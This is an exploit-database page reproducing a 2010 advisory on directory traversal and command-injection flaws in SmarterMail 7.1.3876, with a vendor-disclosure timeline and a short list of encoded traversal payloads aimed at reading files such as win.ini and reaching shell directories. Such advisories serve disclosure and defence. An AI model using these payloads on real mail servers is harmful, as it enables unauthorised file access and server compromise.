[remote exploits] - SmarterMail 7.1.3876 Directory Traversal
Posted on 19 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>SmarterMail 7.1.3876 Directory Traversal Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: remote exploits | Exploit author: sqlhacker' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================== SmarterMail 7.1.3876 Directory Traversal Vulnerability ====================================================== # Vendor: smartertools.com SmarterMail 7.x (7.1.3876) # Date: 2010-09-12 # Author : sqlhacker – http://cloudscan.me # Thanks to : Burp Suite Pro - engagement tool # : FuzzDB # Contact : h02332@gmail.com # Home : http://cloudscan.me # Dork : insite: SmarterMail Enterprise 7.1 # Bug : Directory Traversal, OS Command Injection, Other Critcal Vulns # Tested on : SmarterMail 7.x (7.1.3876) // Windows 2008 /64/R2 # Vendor Contact - August 14, 2010 # -Multiple email exchanges with Vendor thru Labor Day 2010 # - Vendor took no action 9/1/2010 # - Public Disclosure with Workaround Solution Provided 9-4-2010 ######################################################################## Source URL http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html The default installation of SmarterMail is vulnerable to 1 (or more) of the file fuzzing types contained within FuzzDB and Burp Suite Pro 1.3.08 as a baseline analysis for exploit surface modeling. Reduced to exploits, Directory Traversal, OS Injection and Execution. Initial Exploit Requires user-level privs. A malicious user seeking to exploit Browser Clients can launch attacks from the User Home / Public Web Directory utilizing the SSL Certificate of the Host Provider. A malicious user seeking to exploit the Host Server can launch attacks as Local File Inclusion or Remote File Inclusion and perform Operating System Injections and Execution. A malicious user can read and write directories, files and perform malicious operations due to the default configuration of smartermail. This is reduced to: GET {Vulnerable SmarterMail Site}/path/*payload*relative/path/to/target/file/ ..%255c .%5c../..%5c /..%c0%9v../ /..%c0%af../ /..%255c..%255c ../../../../../../win.ini ../../../../../../SmarterMail/ExploitShells ../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere to read/write # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-19]</pre></body></html>
